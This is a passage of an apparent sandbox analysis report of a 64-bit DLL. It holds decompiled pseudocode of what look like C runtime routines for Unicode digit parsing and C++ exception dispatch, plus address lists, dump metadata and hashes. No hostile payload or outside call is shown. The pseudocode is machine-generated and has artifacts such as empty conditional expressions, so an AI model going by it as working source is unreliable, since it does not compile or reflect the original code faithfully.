                                                                      				_v168 = _t405;
                                                                      				E00000001180013858(__rax, __rbx, __rcx, __rdx, _t388, _t389, __r8);
                                                                      				_t379 = _t387[1];
                                                                      				if (_t379 == 0) goto 0x80038b85;
                                                                      				 *_t379 =  *_t387;
                                                                      				goto 0x80038b85;
                                                                      				 *_t383 = _t403 + 2;
                                                                      				_t390 = _t405;
                                                                      				if ( *((intOrPtr*)(_t379 + 0x28)) != r13b) goto 0x80038567;
                                                                      				E000000011800338E0(_t403 + 2, _t376, _t379, _t383, _t388);
                                                                      				goto 0x80038567;
                                                                      				_t360 =  *_t387;
                                                                      				 *_t387 =  *_t387 + 2;
                                                                      				if (E00000001180041E84( *_t360 & 0xffff, 8, _t376, _t379) != 0) goto 0x8003855a;
                                                                      				_t248 =  !=  ? _t246 : _t246 | 0x00000002;
                                                                      				if ((0x0000fffd & _t376 - 0x0000002b) != 0) goto 0x8003859e;
                                                                      				_t362 =  *_t387;
                                                                      				_t190 =  *_t362 & 0x0000ffff;
                                                                      				_t363 =  &(_t362[1]);
                                                                      				 *_t387 = _t363;
                                                                      				_a16 = 0xa70;
                                                                      				_v152 = 0xae6;
                                                                      				_v148 = 0xaf0;
                                                                      				_v144 = 0xb66;
                                                                      				r8d = 0x660;
                                                                      				_v140 = 0xb70;
                                                                      				_t20 = _t363 - 0x80; // 0x5e0
                                                                      				r10d = _t20;
                                                                      				_v136 = 0xc66;
                                                                      				r11d = 0x6f0;
                                                                      				_v132 = 0xc70;
                                                                      				r9d = 0x966;
                                                                      				_v128 = 0xce6;
                                                                      				_v124 = 0xcf0;
                                                                      				_v120 = 0xd66;
                                                                      				_v116 = 0xd70;
                                                                      				_v112 = 0xe50;
                                                                      				_v108 = 0xe5a;
                                                                      				_v104 = 0xed0;
                                                                      				_v100 = 0xeda;
                                                                      				_v96 = 0xf20;
                                                                      				_v92 = 0xf2a;
                                                                      				_v88 = 0x1040;
                                                                      				_v84 = 0x104a;
                                                                      				_v80 = 0x17e0;
                                                                      				_v76 = 0x17ea;
                                                                      				_v72 = 0x1810;
                                                                      				_v68 = 0xff1a;
                                                                      				if ((r15d & 0xffffffef) != 0) goto 0x80038906;
                                                                      				if (_t190 - 0x30 < 0) goto 0x8003885b;
                                                                      				if (_t190 - 0x3a >= 0) goto 0x800386aa;
                                                                      				goto 0x80038856;
                                                                      				if (_t190 - 0xff10 >= 0) goto 0x80038847;
                                                                      				if (_t190 - r8w < 0) goto 0x8003885b;
                                                                      				if (_t190 - 0x66a >= 0) goto 0x800386d2;
                                                                      				goto 0x80038856;
                                                                      				if (_t190 - r11w < 0) goto 0x8003885b;
                                                                      				if (_t190 - 0x6fa >= 0) goto 0x800386f1;
                                                                      				goto 0x80038856;
                                                                      				if (_t190 - r9w < 0) goto 0x8003885b;
                                                                      				if (_t190 - 0x970 >= 0) goto 0x80038710;
                                                                      				goto 0x80038856;
                                                                      				if (_t190 - r10w < 0) goto 0x8003885b;
                                                                      				if (_t190 - 0x9f0 >= 0) goto 0x8003872f;
                                                                      				goto 0x80038856;
                                                                      				if (_t190 - (_t190 & 0x0000ffff) - r10d < 0) goto 0x8003885b;
                                                                      				if (_t190 - _a16 >= 0) goto 0x8003874f;
                                                                      				goto 0x80038856;
                                                                      				if (_t190 - _v152 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v148 < 0) goto 0x800386a0;
                                                                      				if (_t190 - _v144 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v140 < 0) goto 0x800386a0;
                                                                      				if (_t190 - _v136 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v132 < 0) goto 0x800386a0;
                                                                      				if (_t190 - _v128 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v124 < 0) goto 0x800386a0;
                                                                      				if (_t190 - _v120 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v116 < 0) goto 0x800386a0;
                                                                      				if (_t190 - _v112 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v108 < 0) goto 0x800386a0;
                                                                      				if (_t190 - _v104 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v100 < 0) goto 0x800386a0;
                                                                      				if (_t190 - _v96 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v92 < 0) goto 0x800386a0;
                                                                      				if (_t190 - _v88 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v84 < 0) goto 0x800386a0;
                                                                      				if (_t190 - _v80 < 0) goto 0x8003885b;
                                                                      				if (_t190 - _v76 < 0) goto 0x800386a0;
                                                                      				if ((_t190 & 0x0000ffff) - _v72 - 9 > 0) goto 0x8003885b;
                                                                      				goto 0x800386a0;
                                                                      				if (_t190 - _v68 >= 0) goto 0x8003885b;
                                                                      				if ((_t190 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x8003887d;
                                                                      				_t64 = _t379 - 0x41; // 0x925
                                                                      				_t65 = _t379 - 0x61; // 0x905
                                                                      				_t152 = _t65;
                                                                      				if (_t64 - 0x19 <= 0) goto 0x80038872;
                                                                      				if (_t152 - 0x19 > 0) goto 0x800388f7;
                                                                      				if (_t152 - 0x19 > 0) goto 0x8003887a;
                                                                      				_t66 = _t379 - 0x37; // 0x92f
                                                                      				if (_t66 != 0) goto 0x800388f7;
                                                                      				_t380 =  *_t387;
                                                                      				r9d = 0xffdf;
                                                                      				_t241 =  *_t380 & 0x0000ffff;
                                                                      				_t67 =  &(_t380[1]); // 0xffe1
                                                                      				_t398 = _t67;
                                                                      				 *_t387 = _t398;
                                                                      				_t68 = _t383 - 0x58; // 0xfeb8
                                                                      				if ((r9w & _t68) == 0) goto 0x800388df;
                                                                      				 *_t387 = _t380;
                                                                      				_t156 =  !=  ? r15d : 8;
                                                                      				r15d =  !=  ? r15d : 8;
                                                                      				if (_t241 == 0) goto 0x800388d7;
                                                                      				if ( *_t380 == _t241) goto 0x800388d7;
                                                                      				E00000001180013B18(_t363);
                                                                      				 *_t363 = 0x16;
                                                                      				E00000001180013928();
                                                                      				r8d = 0x660;
                                                                      				r11d = 0x6f0;
                                                                      				goto 0x80038906;
                                                                      				r8d = 0x660;
                                                                      				goto 0x80038906;
                                                                      				_t191 =  *_t398 & 0x0000ffff;
                                                                      				_t71 =  &(_t398[1]); // 0xffe3
                                                                      				_t364 = _t71;
                                                                      				 *_t387 = _t364;
                                                                      				r8d = 0x660;
                                                                      				goto 0x800388fc;
                                                                      				_t161 =  !=  ? r15d : 0xa;
                                                                      				r15d = 0xa;
                                                                      				_t400 = r15d;
                                                                      				_t365 = _t364 | 0xffffffff;
                                                                      				r12d = 0x30;
                                                                      				_t73 = ( !=  ? r15d : 0xa) % _t400;
                                                                      				_t243 = ( !=  ? r15d : 0xa) % _t400;
                                                                      				r14d = 0xff10;
                                                                      				if (_t191 - r12w < 0) goto 0x80038ad3;
                                                                      				if (_t191 - 0x3a >= 0) goto 0x8003893c;
                                                                      				goto 0x80038ace;
                                                                      				if (_t191 - r14w >= 0) goto 0x80038abe;
                                                                      				if (_t191 - r8w < 0) goto 0x80038ad3;
                                                                      				if (_t191 - 0x66a >= 0) goto 0x80038965;
                                                                      				goto 0x80038ace;
                                                                      				if (_t191 - r11w < 0) goto 0x80038ad3;
                                                                      				if (_t191 - 0x6fa >= 0) goto 0x80038984;
                                                                      				goto 0x80038ace;
                                                                      				if (_t191 - 0x966 < 0) goto 0x80038ad3;
                                                                      				_t76 = _t365 + 0xa; // 0x970
                                                                      				if (_t191 - _t76 >= 0) goto 0x800389a4;
                                                                      				goto 0x80038ace;
                                                                      				if (_t191 - 0x9e6 < 0) goto 0x80038ad3;
                                                                      				_t77 = _t365 + 0xa; // 0x9f0
                                                                      				if (_t191 - _t77 < 0) goto 0x8003899a;
                                                                      				_t78 =  &(_t380[0x3b]); // 0xa66
                                                                      				if (_t191 - _t78 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _a16 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v152 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v148 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v144 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v140 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v136 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v132 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v128 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v124 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v120 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v116 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v112 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v108 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v104 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v100 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v96 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v92 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v88 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v84 < 0) goto 0x8003899a;
                                                                      				if (_t191 - _v80 < 0) goto 0x80038ad3;
                                                                      				if (_t191 - _v76 < 0) goto 0x8003899a;
                                                                      				if ((_t191 & 0x0000ffff) - _v72 - 9 > 0) goto 0x80038ad3;
                                                                      				goto 0x80038ace;
                                                                      				if (_t191 - _v68 >= 0) goto 0x80038ad3;
                                                                      				if ((_t191 & 0x0000ffff) - r14d != 0xffffffff) goto 0x80038af6;
                                                                      				_t102 = _t380 - 0x41; // 0x925
                                                                      				_t103 = _t380 - 0x61; // 0x905
                                                                      				_t181 = _t103;
                                                                      				if (_t102 - 0x19 <= 0) goto 0x80038ae6;
                                                                      				if (_t181 - 0x19 > 0) goto 0x80038af3;
                                                                      				if (_t181 - 0x19 > 0) goto 0x80038aee;
                                                                      				goto 0x80038af6;
                                                                      				_t399 =  *_t387;
                                                                      				if (((_t191 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r15d >= 0) goto 0x80038b3f;
                                                                      				_t192 =  *_t399 & 0x0000ffff;
                                                                      				_t367 = _t400 * _t390;
                                                                      				_t232 = r13d;
                                                                      				_t384 = _t383 + _t367;
                                                                      				_t344 = _t383 + _t367 - _t367;
                                                                      				_t182 = r13d;
                                                                      				_t345 = _t390 - (_t364 | 0xffffffff);
                                                                      				r8d = 0x660;
                                                                      				 *_t387 =  &(_t399[1]);
                                                                      				_t249 = ( !=  ? _t246 : _t246 | 0x00000002) | (_t232 & 0xffffff00 | _t344 > 0x00000000 | _t182 & 0xffffff00 | _t345 > 0x00000000) << 0x00000002 | 0x00000008;
                                                                      				goto 0x80038921;
                                                                      				_t406 = _a8;
                                                                      				_t369 = _t399 - 2;
                                                                      				_t404 = _v64;
                                                                      				 *_t387 = _t369;
                                                                      				if (_t192 == 0) goto 0x80038b70;
                                                                      				if ( *_t369 == _t192) goto 0x80038b70;
                                                                      				E00000001180013B18(_t369);
                                                                      				 *_t369 = 0x16;
                                                                      				E00000001180013928();
                                                                      				if ((sil & 0x00000008) != 0) goto 0x80038b89;
                                                                      				_t370 = _t387[1];
                                                                      				 *_t387 = _t404;
                                                                      				if (_t370 == 0) goto 0x80038b85;
                                                                      				 *_t370 = _t404;
                                                                      				goto 0x80038c03;
                                                                      				_t237 = ( !=  ? _t246 : _t246 | 0x00000002) | (_t232 & 0xffffff00 | _t344 > 0x00000000 | _t182 & 0xffffff00 | _t345 > 0x00000000) << 0x00000002 | 0x00000008;
                                                                      				_t187 = E0000000118003770C(( !=  ? _t246 : _t246 | 0x00000002) | (_t232 & 0xffffff00 | _t344 > 0x00000000 | _t182 & 0xffffff00 | _t345 > 0x00000000) << 0x00000002 | 0x00000008, _t384);
                                                                      				if (_t187 == 0) goto 0x80038be8;
                                                                      				 *((char*)(_t406 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t406 + 0x2c)) = 0x22;
                                                                      				if ((sil & 0x00000001) != 0) goto 0x80038bb0;
                                                                      				goto 0x80038bf1;
                                                                      				_t381 = _t387[1];
                                                                      				if ((sil & 0x00000002) == 0) goto 0x80038bd1;
                                                                      				if (_t381 == 0) goto 0x80038bc5;
                                                                      				 *_t381 =  *_t387;
                                                                      				goto 0x80038c03;
                                                                      				if (_t381 == 0) goto 0x80038bdc;
                                                                      				 *_t381 =  *_t387;
                                                                      				goto 0x80038c03;
                                                                      				if ((sil & 0x00000002) == 0) goto 0x80038bf1;
                                                                      				_t386 = _t387[1];
                                                                      				if (_t386 == 0) goto 0x80038c00;
                                                                      				 *_t386 =  *_t387;
                                                                      				return _t187;
                                                                      			}


































































                                                                      0x1800384a8
                                                                      0x1800384a8
                                                                      0x1800384a8
                                                                      0x1800384ad
                                                                      0x1800384c4
                                                                      0x1800384c7
                                                                      0x1800384ca
                                                                      0x1800384ce
                                                                      0x1800384d1
                                                                      0x1800384d9
                                                                      0x1800384df
                                                                      0x1800384e1
                                                                      0x1800384e6
                                                                      0x1800384ec
                                                                      0x1800384f1
                                                                      0x1800384f6
                                                                      0x1800384ff
                                                                      0x180038501
                                                                      0x180038506
                                                                      0x180038509
                                                                      0x18003850d
                                                                      0x180038510
                                                                      0x18003851b
                                                                      0x180038520
                                                                      0x180038525
                                                                      0x18003852c
                                                                      0x180038535
                                                                      0x180038538
                                                                      0x180038547
                                                                      0x18003854a
                                                                      0x180038551
                                                                      0x180038553
                                                                      0x180038558
                                                                      0x18003855a
                                                                      0x180038564
                                                                      0x180038576
                                                                      0x180038586
                                                                      0x18003858f
                                                                      0x180038591
                                                                      0x180038594
                                                                      0x180038597
                                                                      0x18003859b
                                                                      0x18003859e
                                                                      0x1800385ae
                                                                      0x1800385bb
                                                                      0x1800385c8
                                                                      0x1800385d0
                                                                      0x1800385d6
                                                                      0x1800385de
                                                                      0x1800385de
                                                                      0x1800385e2
                                                                      0x1800385ea
                                                                      0x1800385f0
                                                                      0x1800385f8
                                                                      0x1800385fe
                                                                      0x180038606
                                                                      0x18003860e
                                                                      0x180038616
                                                                      0x18003861e
                                                                      0x180038626
                                                                      0x18003862e
                                                                      0x180038636
                                                                      0x18003863e
                                                                      0x180038646
                                                                      0x18003864e
                                                                      0x180038656
                                                                      0x18003865e
                                                                      0x180038666
                                                                      0x18003866e
                                                                      0x180038679
                                                                      0x18003868b
                                                                      0x180038694
                                                                      0x18003869e
                                                                      0x1800386a5
                                                                      0x1800386ad
                                                                      0x1800386b7
                                                                      0x1800386c5
                                                                      0x1800386cd
                                                                      0x1800386d6
                                                                      0x1800386e4
                                                                      0x1800386ec
                                                                      0x1800386f5
                                                                      0x180038703
                                                                      0x18003870b
                                                                      0x180038714
                                                                      0x180038722
                                                                      0x18003872a
                                                                      0x180038732
                                                                      0x180038740
                                                                      0x18003874a
                                                                      0x180038756
                                                                      0x180038761
                                                                      0x18003876e
                                                                      0x180038779
                                                                      0x180038786
                                                                      0x180038791
                                                                      0x18003879e
                                                                      0x1800387a9
                                                                      0x1800387b6
                                                                      0x1800387c1
                                                                      0x1800387ce
                                                                      0x1800387d9
                                                                      0x1800387e6
                                                                      0x1800387ed
                                                                      0x1800387fa
                                                                      0x180038801
                                                                      0x18003880e
                                                                      0x180038815
                                                                      0x180038822
                                                                      0x180038829
                                                                      0x180038840
                                                                      0x180038842
                                                                      0x18003884f
                                                                      0x180038859
                                                                      0x18003885e
                                                                      0x180038864
                                                                      0x180038864
                                                                      0x180038867
                                                                      0x18003886c
                                                                      0x180038875
                                                                      0x18003887a
                                                                      0x18003887f
                                                                      0x180038881
                                                                      0x180038884
                                                                      0x18003888a
                                                                      0x18003888d
                                                                      0x18003888d
                                                                      0x180038891
                                                                      0x180038894
                                                                      0x18003889b
                                                                      0x1800388a0
                                                                      0x1800388a8
                                                                      0x1800388ac
                                                                      0x1800388b2
                                                                      0x1800388b7
                                                                      0x1800388b9
                                                                      0x1800388be
                                                                      0x1800388c4
                                                                      0x1800388c9
                                                                      0x1800388cf
                                                                      0x1800388d5
                                                                      0x1800388d7
                                                                      0x1800388dd
                                                                      0x1800388df
                                                                      0x1800388e3
                                                                      0x1800388e3
                                                                      0x1800388e7
                                                                      0x1800388ea
                                                                      0x1800388f5
                                                                      0x1800388ff
                                                                      0x180038903
                                                                      0x180038906
                                                                      0x18003890b
                                                                      0x18003890f
                                                                      0x180038915
                                                                      0x180038915
                                                                      0x180038918
                                                                      0x180038925
                                                                      0x18003892f
                                                                      0x180038937
                                                                      0x180038940
                                                                      0x18003894a
                                                                      0x180038958
                                                                      0x180038960
                                                                      0x180038969
                                                                      0x180038977
                                                                      0x18003897f
                                                                      0x18003898c
                                                                      0x180038992
                                                                      0x180038998
                                                                      0x18003899f
                                                                      0x1800389ac
                                                                      0x1800389b2
                                                                      0x1800389b8
                                                                      0x1800389ba
                                                                      0x1800389c0
                                                                      0x1800389ce
                                                                      0x1800389d7
                                                                      0x1800389e2
                                                                      0x1800389eb
                                                                      0x1800389f6
                                                                      0x1800389ff
                                                                      0x180038a0a
                                                                      0x180038a13
                                                                      0x180038a1e
                                                                      0x180038a2b
                                                                      0x180038a36
                                                                      0x180038a43
                                                                      0x180038a4e
                                                                      0x180038a5b
                                                                      0x180038a62
                                                                      0x180038a6f
                                                                      0x180038a76
                                                                      0x180038a83
                                                                      0x180038a8a
                                                                      0x180038a97
                                                                      0x180038a9e
                                                                      0x180038ab5
                                                                      0x180038abc
                                                                      0x180038ac6
                                                                      0x180038ad1
                                                                      0x180038ad6
                                                                      0x180038adc
                                                                      0x180038adc
                                                                      0x180038adf
                                                                      0x180038ae4
                                                                      0x180038ae9
                                                                      0x180038af1
                                                                      0x180038af6
                                                                      0x180038afc
                                                                      0x180038afe
                                                                      0x180038b05
                                                                      0x180038b0b
                                                                      0x180038b0e
                                                                      0x180038b11
                                                                      0x180038b14
                                                                      0x180038b1a
                                                                      0x180038b2c
                                                                      0x180038b35
                                                                      0x180038b38
                                                                      0x180038b3a
                                                                      0x180038b3f
                                                                      0x180038b47
                                                                      0x180038b4b
                                                                      0x180038b53
                                                                      0x180038b59
                                                                      0x180038b5e
                                                                      0x180038b60
                                                                      0x180038b65
                                                                      0x180038b6b
                                                                      0x180038b74
                                                                      0x180038b76
                                                                      0x180038b7a
                                                                      0x180038b80
                                                                      0x180038b82
                                                                      0x180038b87
                                                                      0x180038b8c
                                                                      0x180038b8e
                                                                      0x180038b95
                                                                      0x180038b97
                                                                      0x180038b9c
                                                                      0x180038ba8
                                                                      0x180038bae
                                                                      0x180038bb0
                                                                      0x180038bb8
                                                                      0x180038bbd
                                                                      0x180038bc2
                                                                      0x180038bcf
                                                                      0x180038bd4
                                                                      0x180038bd9
                                                                      0x180038be6
                                                                      0x180038bec
                                                                      0x180038bf1
                                                                      0x180038bf8
                                                                      0x180038bfd
                                                                      0x180038c1d

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: -$0$f$p$p
                                                                      • API String ID: 3215553584-1865143739
                                                                      • Opcode ID: 4e0e0ca7717c66fc08c757cbe74f93b1cbcb4fd66c53fce3c7c06e74f9429d9c
                                                                      • Instruction ID: de466fa8c3973db79afb17cb53eb20f96fb494a04873468b854e538cdb873a3c
                                                                      • Opcode Fuzzy Hash: 4e0e0ca7717c66fc08c757cbe74f93b1cbcb4fd66c53fce3c7c06e74f9429d9c
                                                                      • Instruction Fuzzy Hash: BB12117260474986FBA39B14E0543EB73A1FB887D0FDAC156F69547AC4DF38C688AB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E000000011800103C4(intOrPtr __ecx, void* __edx, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				signed int* _t127;
                                                                      				void* _t144;
                                                                      				intOrPtr _t145;
                                                                      				intOrPtr _t153;
                                                                      				void* _t172;
                                                                      				intOrPtr _t175;
                                                                      				signed int _t176;
                                                                      				signed int _t177;
                                                                      				void* _t179;
                                                                      				void* _t208;
                                                                      				signed long long _t218;
                                                                      				signed long long _t219;
                                                                      				signed long long _t225;
                                                                      				long long _t227;
                                                                      				signed int _t234;
                                                                      				intOrPtr* _t235;
                                                                      				intOrPtr* _t236;
                                                                      				long long _t266;
                                                                      				signed int* _t279;
                                                                      				long long _t280;
                                                                      				void* _t281;
                                                                      				void* _t282;
                                                                      				signed long long _t283;
                                                                      				long long _t295;
                                                                      				signed int _t304;
                                                                      
                                                                      				_t281 = _t282 - 0x28;
                                                                      				_t283 = _t282 - 0x128;
                                                                      				_t218 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t219 = _t218 ^ _t283;
                                                                      				 *(_t281 + 0x10) = _t219;
                                                                      				_t279 =  *((intOrPtr*)(_t281 + 0x90));
                                                                      				_t304 =  *((intOrPtr*)(_t281 + 0xa8));
                                                                      				 *((long long*)(_t283 + 0x68)) = __r8;
                                                                      				_t235 = __rcx;
                                                                      				 *((long long*)(_t281 - 0x80)) = __rdx;
                                                                      				 *(_t281 - 0x68) = _t304;
                                                                      				 *((char*)(_t283 + 0x60)) = 0;
                                                                      				_t280 = __r9;
                                                                      				_t127 = E00000001180012958(__ecx, __rcx, __rdx, __r9, __r9, _t281, _t279, __r9);
                                                                      				r14d = _t127;
                                                                      				if (_t127 - 0xffffffff < 0) goto 0x80010883;
                                                                      				if (_t127 - _t279[1] >= 0) goto 0x80010883;
                                                                      				if ( *_t235 != 0xe06d7363) goto 0x8001050f;
                                                                      				if ( *((intOrPtr*)(_t235 + 0x18)) != 4) goto 0x8001050f;
                                                                      				if ( *((intOrPtr*)(_t235 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8001050f;
                                                                      				if ( *((long long*)(_t235 + 0x30)) != 0) goto 0x8001050f;
                                                                      				E0000000118000E0F4(_t219);
                                                                      				if ( *((long long*)(_t219 + 0x20)) == 0) goto 0x8001081c;
                                                                      				E0000000118000E0F4(_t219);
                                                                      				_t236 =  *((intOrPtr*)(_t219 + 0x20));
                                                                      				E0000000118000E0F4(_t219);
                                                                      				 *((char*)(_t283 + 0x60)) = 1;
                                                                      				 *((long long*)(_t283 + 0x68)) =  *((intOrPtr*)(_t219 + 0x28));
                                                                      				E0000000118000F21C(_t219,  *((intOrPtr*)(_t236 + 0x38)));
                                                                      				if ( *_t236 != 0xe06d7363) goto 0x800104c7;
                                                                      				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x800104c7;
                                                                      				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x800104c7;
                                                                      				if ( *((long long*)(_t236 + 0x30)) == 0) goto 0x80010883;
                                                                      				E0000000118000E0F4(_t219);
                                                                      				if ( *(_t219 + 0x38) == 0) goto 0x8001050f;
                                                                      				E0000000118000E0F4(_t219);
                                                                      				E0000000118000E0F4(_t219);
                                                                      				 *(_t219 + 0x38) =  *(_t219 + 0x38) & 0x00000000;
                                                                      				if (E00000001180012A90(_t219, _t236, _t236,  *(_t219 + 0x38), __r9) != 0) goto 0x8001050a;
                                                                      				if (E00000001180012B80(_t219, _t236,  *(_t219 + 0x38), __r9, _t281) == 0) goto 0x80010860;
                                                                      				goto 0x8001083c;
                                                                      				 *((long long*)(_t281 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
                                                                      				 *(_t281 - 0x48) = _t279;
                                                                      				if ( *_t236 != 0xe06d7363) goto 0x800107d3;
                                                                      				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x800107d3;
                                                                      				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x800107d3;
                                                                      				r13d = 0;
                                                                      				if (_t279[3] - r13d <= 0) goto 0x80010704;
                                                                      				 *(_t283 + 0x28) =  *(_t281 + 0xa0);
                                                                      				 *(_t283 + 0x20) = _t279;
                                                                      				r8d = r14d;
                                                                      				_t144 = E0000000118000EA5C(_t236, _t281 - 0x28, _t281 - 0x48, __r9, _t281, __r9, __r10);
                                                                      				asm("movups xmm0, [ebp-0x28]");
                                                                      				asm("movdqu [ebp-0x38], xmm0");
                                                                      				asm("psrldq xmm0, 0x8");
                                                                      				asm("movd eax, xmm0");
                                                                      				if (_t144 -  *((intOrPtr*)(_t281 - 0x10)) >= 0) goto 0x80010704;
                                                                      				_t295 =  *((intOrPtr*)(_t281 - 0x28));
                                                                      				r12d =  *((intOrPtr*)(_t281 - 0x30));
                                                                      				 *((long long*)(_t283 + 0x78)) = _t295;
                                                                      				_t145 = r12d;
                                                                      				asm("inc ecx");
                                                                      				 *((intOrPtr*)(_t281 - 0x50)) = __ecx;
                                                                      				asm("movd eax, xmm0");
                                                                      				asm("movups [ebp-0x60], xmm0");
                                                                      				if (_t145 - r14d > 0) goto 0x800106f3;
                                                                      				_t225 =  *(_t281 - 0x60) >> 0x20;
                                                                      				if (r14d - _t145 > 0) goto 0x800106f3;
                                                                      				_t266 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t281 - 0x38)) + 0x10)) + ( *( *(_t281 - 0x38)) +  *( *(_t281 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t295 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
                                                                      				 *((long long*)(_t281 - 0x70)) = _t266;
                                                                      				if (r15d == 0) goto 0x800106f0;
                                                                      				asm("movups xmm0, [edx+ecx*4]");
                                                                      				asm("movups [ebp-0x8], xmm0");
                                                                      				 *((intOrPtr*)(_t281 + 8)) =  *((intOrPtr*)(_t266 + 0x10 + (_t225 + _t225 * 4) * 4));
                                                                      				E0000000118000F1F0(_t225);
                                                                      				_t227 = _t225 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x30)) + 0xc));
                                                                      				 *((long long*)(_t283 + 0x70)) = _t227;
                                                                      				E0000000118000F1F0(_t227);
                                                                      				_t175 =  *((intOrPtr*)(_t227 +  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x30)) + 0xc))));
                                                                      				 *((intOrPtr*)(_t283 + 0x64)) = _t175;
                                                                      				if (_t175 <= 0) goto 0x80010681;
                                                                      				E0000000118000F1F0(_t227);
                                                                      				 *((long long*)(_t281 - 0x78)) = _t227 +  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x70))));
                                                                      				if (E00000001180011290(_t179, _t236, _t281 - 8, _t227 +  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x70)))), _t279, __r9,  *((intOrPtr*)(_t236 + 0x30))) != 0) goto 0x80010692;
                                                                      				 *((long long*)(_t283 + 0x70)) =  *((long long*)(_t283 + 0x70)) + 4;
                                                                      				_t153 =  *((intOrPtr*)(_t283 + 0x64)) - 1;
                                                                      				 *((intOrPtr*)(_t283 + 0x64)) = _t153;
                                                                      				if (_t153 > 0) goto 0x80010645;
                                                                      				r13d = r13d + 1;
                                                                      				if (r13d == r15d) goto 0x800106eb;
                                                                      				goto 0x800105fe;
                                                                      				 *((char*)(_t283 + 0x58)) =  *((intOrPtr*)(_t281 + 0x98));
                                                                      				 *(_t283 + 0x50) =  *((intOrPtr*)(_t283 + 0x60));
                                                                      				 *((long long*)(_t283 + 0x48)) =  *(_t281 - 0x68);
                                                                      				 *(_t283 + 0x40) =  *(_t281 + 0xa0);
                                                                      				 *(_t283 + 0x38) = _t281 - 0x60;
                                                                      				 *(_t283 + 0x30) =  *((intOrPtr*)(_t281 - 0x78));
                                                                      				 *(_t283 + 0x28) = _t281 - 8;
                                                                      				 *(_t283 + 0x20) = _t279;
                                                                      				E0000000118001021C(_t175, _t236, _t236,  *((intOrPtr*)(_t281 - 0x80)),  *((intOrPtr*)(_t283 + 0x68)), _t280);
                                                                      				r13d = 0;
                                                                      				r12d = r12d + 1;
                                                                      				if (r12d -  *((intOrPtr*)(_t281 - 0x10)) < 0) goto 0x80010599;
                                                                      				if (( *_t279 & 0x1fffffff) - 0x19930521 < 0) goto 0x80010810;
                                                                      				_t208 = _t279[8] - r13d;
                                                                      				if (_t208 == 0) goto 0x8001072a;
                                                                      				E0000000118000F1DC(_t281 - 8);
                                                                      				if (_t208 != 0) goto 0x8001074b;
                                                                      				if ((_t279[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80010810;
                                                                      				if (E0000000118000E8A0(_t279[9] >> 0x00000002 & 0x00000001, _t281 - 8 + _t279[8], _t280, _t279) != 0) goto 0x80010810;
                                                                      				if ((_t279[9] >> 0x00000002 & 0x00000001) != 0) goto 0x80010866;
                                                                      				if (_t279[8] == r13d) goto 0x80010770;
                                                                      				E0000000118000F1DC(_t281 - 8 + _t279[8]);
                                                                      				_t234 = _t279[8];
                                                                      				goto 0x80010773;
                                                                      				if (E00000001180012A90(_t234, _t236, _t236, _t304, _t280) != 0) goto 0x80010810;
